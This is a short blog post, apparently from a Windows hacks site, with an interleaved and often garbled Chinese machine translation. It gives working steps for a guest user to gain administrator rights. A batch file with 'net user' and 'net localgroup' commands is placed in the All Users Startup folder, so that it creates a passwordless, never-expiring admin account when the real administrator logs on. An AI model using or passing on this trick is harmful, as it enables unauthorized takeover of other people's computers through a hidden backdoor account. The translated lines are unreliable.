Using Guest Create An Admin Account使用客戶創建一個管理員帳戶
Step 1: Open up Notepad, copy and paste the following code into it and save the file as admin.bat .第1步:打開記事本,複製並粘貼到下面的代碼,並保存該文件作為admin.bat 。 (You could actually give it any name, just make sure that the extension is .bat ) (您實際上可以給它以任何名義,公正,確保延長。蝙蝠 )
@echo off @迴聲關閉
net user Newadmin /add /expires:never /passwordreq:no淨用戶Newadmin /添加/到期:從未/ passwordreq :無
net localgroup “Administrators” /add Newadmin淨localgroup “管理員” /新增Newadmin
Step 2: Copy the file to the Startup folder.第2步:將文件複製到啟動文件夾。 Here is the path to the Startup folder:這是路徑,啟動文件夾:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup ç : \文件和設置\所有用戶\開始菜單\程序\啟動
Step 3: There is no step 3.第3步:沒有第3步。
The next time the admin logs on into the computer, the batch file runs and the admin account is created.下一次管理員登錄到計算機,該批處理文件運行和管理帳戶的創建。 Once the admin logs off, you can log in using the username newadmin and without any password.一旦管理員註銷,就可以登錄使用的用戶名newadmin ,也沒有任何密碼。
Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.請記住,它不會需要很長時間的真正的管理員找出一個新的管理員帳戶已創建。
Popularity: 1%人氣: 1 %
Written by magakos. 撰稿magakos 。 Read more great feeds at is source 閱讀更多的是供稿源 WEBSITE 網站
no comments 沒有評論 . 。
Read more articles on 閱讀更多文章 Windows Hacks and Solutions 的Windows技巧和解決方案 and 和 otherSoftware otherSoftware and 和 Tips 竅門 . 。
- [+] Digg [ + ] Digg的 : Feature this article :特徵本文
- [+] Del.icio.us [ + ] Del.icio.us : Bookmark this article : 06條
- [+] Furl [ + ]卷 : Bookmark this article : 06條















